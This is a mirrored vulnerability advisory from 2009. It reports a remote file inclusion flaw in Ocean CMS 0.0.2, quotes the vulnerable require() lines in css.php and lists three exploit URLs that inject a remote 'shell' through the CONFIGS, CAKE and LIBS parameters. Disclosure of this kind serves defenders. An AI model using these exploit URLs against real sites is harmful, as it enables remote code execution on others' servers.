Computer Security

Security Advisory: Ocean CMS 0.0.2 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

From:Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date:19.07.2009
Subject:Ocean CMS 0.0.2 Remote File Inclusion Vulnerability

       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       +                                                                        +
       +          Ocean CMS 0.0.2 Remote File Inclusion Vulnerability       +
       +                                                                    +
       +                       Discovered by Cru3l.b0y                      +
       +                                                                    +
       +                         WwW.DeltaHacking.Net                       +
       +                                                                    +
       +                                                                    +
       +                                                                    +
       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



#################################################################################
##################
AUTHOR      : Cru3l.b0y
APPLICATION : Ocean CMS
VERSION     : 0.0.2
DOWNLOAD    : http://cakeforge.org/frs/download.php/113/OceanCMS.tar.bz
VENDOR      : http://cakeforge.org/
#################################################################################
##################


Vulnerable Code :
#################################################################################
##################
/webroot/css.php
                                                                                 
               
34     require(CONFIGS.'paths.php');
35     require(CAKE.'basics.php');
36     require(LIBS.'folder.php');                                                               
                                                                                 
          
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CONFIGS=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CAKE=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?LIBS=shell
#################################################################################
##################

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server